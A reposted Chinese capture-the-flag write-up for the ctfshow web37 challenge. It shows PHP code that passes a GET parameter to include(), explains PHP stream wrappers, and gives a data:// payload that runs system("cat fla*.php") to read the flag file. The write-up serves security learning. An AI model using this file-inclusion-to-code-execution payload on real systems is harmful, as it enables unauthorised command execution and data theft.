标签:文件 include web37 命令 flag ctfshow php data
ctfshow-web37
文章目录
题目描述:
原理:
审计:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){ //过滤了flag
include($c); //文件包含漏洞,包含变量c
echo $flag; //输出变量flag的内容
}
}else{
highlight_file(__FILE__);
}
方法:
思路:
利用文件按包含漏洞,data协议
以为include()函数可以文件包含一个文件,并且可以执行该文件的内容(如果该文件有代码内容的话)
这个题是include包含的变量c,同样,可以利用文件包含漏洞,将c变量想办法变更成php代码,从而通过include函数执行。
协议:
php://协议
php:// 访问各个输入/输出流,在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行
file://协议 用于访问本地文件系统,在CTF中通常用来读取本地文件
data://协议 通常可以用来执行PHP代码
payload:
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
ls查看有什么文件,发现flag.php
cat flag.php
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
得到flag
Flag:
ctfshow{f743851c-e2ec-4033-b3ed-356d7ac1863d}
标签:文件,include,web37,命令,flag,ctfshow,php,data 来源: https://blog.csdn.net/weixin_43400535/article/details/121123783
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。